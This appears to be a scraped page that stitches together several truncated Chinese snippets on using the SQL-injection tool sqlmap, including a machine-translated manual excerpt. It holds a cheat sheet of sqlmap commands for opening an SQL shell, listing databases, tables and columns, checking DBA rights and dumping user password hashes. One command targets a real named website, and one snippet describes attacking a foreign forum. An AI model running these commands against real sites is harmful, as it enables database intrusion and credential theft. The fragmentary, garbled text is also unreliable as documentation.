svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devsqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1"-v 1–sql-shell //执行SQL语句sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1"-v 5//更详细的信息load options froma configuration INI filesqlmap -c sqlmap.conf使用POST方法提交sqlmap.py -u &qu

今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入，实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法，，直接做个记录、、sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称sqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段 sqlmap  -u&

内容摘自网络,整理:mer4en7y1)判断当前用户是否是dbapython sqlmap.py -u "url" --is-dba -v 12)--users:列出数据库管理系统用户python sqlmap.py -u "url" --users -v 03)--passwords:数据库用户密码(hash)python sqlmap.py -u "url" --passwords -v 0python sqlmap.py -u "url" --passwords -U sa -v 04)查看用户权限python sqlmap.py -u "url" --privileges -v 0python sqlma

英文版：https://github.com/sqlmapproject/sqlmap/wiki/Usage如果您想要一个更加准确数据库指印, 并且根据横幅解析, 您能并且提供 -b 或 --banner 选择:$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f -b[...][hh:mm:45] [INFO] testing MySQL[hh:mm:45] [INFO] query: CONCAT('4', '4')[hh:mm:45] [INFO] retrieved: 44[hh:mm:45] [INFO] performed 20 queries in 0 seconds[hh:mm:

1 。 介绍1.1 要求 1.2 网应用情节 1.3 SQL 射入技术 1.4 特点 1.5 下载和更新sqlmap 1.6 执照2 。 用法2.1 帮助 2.2 目标URL 2.3 目标URL 和verbosity 2.4 URL 参量 2.5 Google dork 2.6 HTTP 方法: 得到或张贴 2.7 张贴的数据串 2.8 HTTP 曲奇饼倒栽跳水 2.9 HTTP 用户代理倒栽跳水 2.10 任意HTTP 用户代理倒栽跳水 2.11 HTTP 认证 2.12 HTTP 代理人 2.13 串比赛 2.14 遥远的数据库管